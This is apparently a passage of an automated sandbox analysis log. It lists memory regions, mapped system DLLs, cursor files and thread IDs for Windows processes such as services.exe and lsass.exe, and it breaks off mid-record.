entry_point = 0x280000 region_type = mapped_file name = "aero_nwse.cur" filename = "\\Windows\\Cursors\\aero_nwse.cur" (normalized: "c:\\windows\\cursors\\aero_nwse.cur") Region: id = 38538 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_nesw.cur" filename = "\\Windows\\Cursors\\aero_nesw.cur" (normalized: "c:\\windows\\cursors\\aero_nesw.cur") Region: id = 38539 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_ew.cur" filename = "\\Windows\\Cursors\\aero_ew.cur" (normalized: "c:\\windows\\cursors\\aero_ew.cur") Region: id = 38540 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_ns.cur" filename = "\\Windows\\Cursors\\aero_ns.cur" (normalized: "c:\\windows\\cursors\\aero_ns.cur") Region: id = 38541 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_move.cur" filename = "\\Windows\\Cursors\\aero_move.cur" (normalized: "c:\\windows\\cursors\\aero_move.cur") Region: id = 38542 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_unavail.cur" filename = "\\Windows\\Cursors\\aero_unavail.cur" (normalized: "c:\\windows\\cursors\\aero_unavail.cur") Region: id = 38543 start_va = 0x5f0000 end_va = 0x62dfff entry_point = 0x5f0000 region_type = mapped_file name = "aero_working.ani" filename = "\\Windows\\Cursors\\aero_working.ani" (normalized: "c:\\windows\\cursors\\aero_working.ani") Region: id = 38544 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_helpsel.cur" filename = "\\Windows\\Cursors\\aero_helpsel.cur" (normalized: "c:\\windows\\cursors\\aero_helpsel.cur") Region: id = 38545 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_pen.cur" filename = "\\Windows\\Cursors\\aero_pen.cur" (normalized: "c:\\windows\\cursors\\aero_pen.cur") Region: id = 38546 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_link.cur" filename = "\\Windows\\Cursors\\aero_link.cur" (normalized: "c:\\windows\\cursors\\aero_link.cur") Region: id = 38550 start_va = 0xe70000 end_va = 0xf4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 38551 start_va = 0x1f10000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 38552 start_va = 0x73f40000 end_va = 0x73f49fff entry_point = 0x73f40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 38553 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38554 start_va = 0x72a80000 end_va = 0x72a91fff entry_point = 0x72a80000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 38559 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38560 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38561 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38562 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Thread: id = 1045 os_tid = 0x188 Thread: id = 1047 os_tid = 0x1a0 Thread: id = 1048 os_tid = 0x1a4 Thread: id = 1116 os_tid = 0x2cc Thread: id = 1140 os_tid = 0x334 Thread: id = 1195 os_tid = 0x418 Thread: id = 1196 os_tid = 0x420 Thread: id = 1201 os_tid = 0x430 Process: id = "667" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x7f1d1080" os_pid = "0x1c0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "664" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36798 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36799 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 36800 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 36801 start_va = 0xc00000 end_va = 0xc40fff entry_point = 0xc00000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 36802 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36803 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36804 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36805 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36806 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36808 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 36850 start_va = 0x1f0000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 36851 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36852 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36853 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36854 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36855 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36856 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36857 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36858 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36859 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36860 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36861 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36862 start_va = 0xc0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36863 start_va = 0x75b70000 end_va = 0x75b7efff entry_point = 0x75b70000 region_type = mapped_file name = "scext.dll" filename = "\\Windows\\System32\\scext.dll" (normalized: "c:\\windows\\system32\\scext.dll") Region: id = 36885 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36886 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36887 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36888 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36889 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36890 start_va = 0x75ae0000 end_va = 0x75b2dfff entry_point = 0x75ae0000 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 37029 start_va = 0x753c0000 end_va = 0x753d8fff entry_point = 0x753c0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 37030 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37031 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 37032 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 37033 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37034 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37035 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37036 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37037 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 37038 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37039 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 37040 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 37041 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 37042 start_va = 0x560000 end_va = 0x952fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 37043 start_va = 0x960000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 37049 start_va = 0x180000 end_va = 0x18cfff entry_point = 0x180000 region_type = mapped_file name = "tsusbflt.sys" filename = "\\Windows\\System32\\drivers\\TsUsbFlt.sys" (normalized: "c:\\windows\\system32\\drivers\\tsusbflt.sys") Region: id = 37050 start_va = 0x190000 end_va = 0x190fff entry_point = 0x190000 region_type = mapped_file name = "tsusbflt.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tsusbflt.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tsusbflt.sys.mui") Region: id = 37051 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37052 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37053 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 37054 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37055 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37056 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37057 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37058 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37059 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37060 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37061 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37062 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37063 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37064 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37065 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37066 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37067 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37068 start_va = 0x758b0000 end_va = 0x758cafff entry_point = 0x758b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 37069 start_va = 0x180000 end_va = 0x184fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 37071 start_va = 0x75390000 end_va = 0x753bbfff entry_point = 0x75390000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 37072 start_va = 0xc70000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 37073 start_va = 0xcb0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 37074 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37075 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37076 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 37077 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 37078 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 37079 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37080 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 37081 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37082 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 37083 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37088 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 37089 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37090 start_va = 0xd20000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 37091 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 37092 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37093 start_va = 0xea0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 37094 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37095 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 37096 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 37097 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 37098 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37200 start_va = 0xf20000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 37201 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 38745 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 38746 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38864 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38865 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Thread: id = 1058 os_tid = 0x1c4 Thread: id = 1073 os_tid = 0x210 Thread: id = 1074 os_tid = 0x214 Thread: id = 1075 os_tid = 0x218 Thread: id = 1076 os_tid = 0x21c Thread: id = 1077 os_tid = 0x220 Thread: id = 1078 os_tid = 0x224 Thread: id = 1079 os_tid = 0x228 Thread: id = 1080 os_tid = 0x22c Thread: id = 1081 os_tid = 0x230 Thread: id = 1082 os_tid = 0x234 Thread: id = 1083 os_tid = 0x238 Thread: id = 1097 os_tid = 0x274 Thread: id = 1197 os_tid = 0x41c Process: id = "668" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x7f1d10e0" os_pid = "0x1d0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "664" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36809 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36810 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 36811 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 36812 start_va = 0x2c0000 end_va = 0x2c8fff entry_point = 0x2c0000 region_type = mapped_file name = "lsass.exe" filename = "\\Windows\\System32\\lsass.exe" (normalized: "c:\\windows\\system32\\lsass.exe") Region: id = 36813 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36814 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36815 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36816 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36817 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36819 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 36864 start_va = 0x2d0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 36865 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36866 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36867 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36868 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36869 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36870 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36871 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36872 start_va = 0x75b60000 end_va = 0x75b66fff entry_point = 0x75b60000 region_type = mapped_file name = "sspisrv.dll" filename = "\\Windows\\System32\\sspisrv.dll" (normalized: "c:\\windows\\system32\\sspisrv.dll") Region: id = 36891 start_va = 0xc0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36892 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 36893 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 36894 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 36895 start_va = 0x759e0000 end_va = 0x75adffff entry_point = 0x759e0000 region_type = mapped_file name = "lsasrv.dll" filename = "\\Windows\\System32\\lsasrv.dll" (normalized: "c:\\windows\\system32\\lsasrv.dll") Region: id = 36896 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36897 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36898 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36899 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36900 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36901 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36902 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36903 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36904 start_va = 0x75950000 end_va = 0x759dafff entry_point = 0x75950000 region_type = mapped_file name = "samsrv.dll" filename = "\\Windows\\System32\\samsrv.dll" (normalized: "c:\\windows\\system32\\samsrv.dll") Region: id = 36905 start_va = 0x75930000 end_va = 0x75940fff entry_point = 0x75930000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 36906 start_va = 0x75cc0000 end_va = 0x75ccbfff entry_point = 0x75cc0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 36907 start_va = 0x758e0000 end_va = 0x75921fff entry_point = 0x758e0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 36908 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36909 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 36910 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 36911 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36912 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36913 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36919 start_va = 0x2d0000 end_va = 0x34ffff entry_point = 0x0 region_type = 